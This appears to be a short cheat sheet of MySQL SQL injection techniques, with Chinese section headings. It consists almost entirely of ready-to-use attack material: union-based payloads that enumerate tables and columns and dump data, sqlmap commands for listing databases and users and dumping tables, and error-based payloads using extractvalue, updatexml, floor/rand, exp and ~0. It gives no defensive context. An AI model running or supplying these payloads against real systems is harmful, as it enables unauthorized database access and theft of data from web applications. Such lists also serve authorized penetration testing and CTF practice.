sql

mysql联合注入

group_concat('[',version(),'][',database(),'][',@@datadir,'][',current_user(),'][',user(),'][',system_user(),'][',@@version_compile_os,']')

查询表名：

union select group_concat(table_name) from information_schema.tables where table_schema=database()

查询列名：

union select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='$table_name'

查询数据：

union select group_concat($column1,'---',$column2,'---',$column3) from $table_name

sqlmap

sqlmap -u '$url'
sqlmap -u '$url' --dbs
sqlmap -u '$url' --current-db
sqlmap -u '$url' -D '$database_name' --tables
sqlmap -u '$url' -D '$database_name' -T '$table_name' --columns
sqlmap -u '$url' -D '$database_name' -T '$table_name' -C '$column1,$column2,$column3' --dump
sqlmap -u '$url' -f
sqlmap -u '$url' -b
sqlmap -u '$url' --is-dba
sqlmap -u '$url' --users
sqlmap -u '$url' --current-user
sqlmap -u '$url' --privileges
sqlmap -u '$url' --roles

报错注入：

extractvalue()

and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+

updatexml()

and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+

and updatexml(1,concat(0x7e,(select @@version)),1)--+

floor(),rand()

union select count(*),1,concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a%23

exp()

union select exp(~(select * from (select table_name from information_schema.tables where table_schema=database() limit 0,1)a)),2,3%23

~0

union select (!(select * from (select user())x) - ~0),2,3--+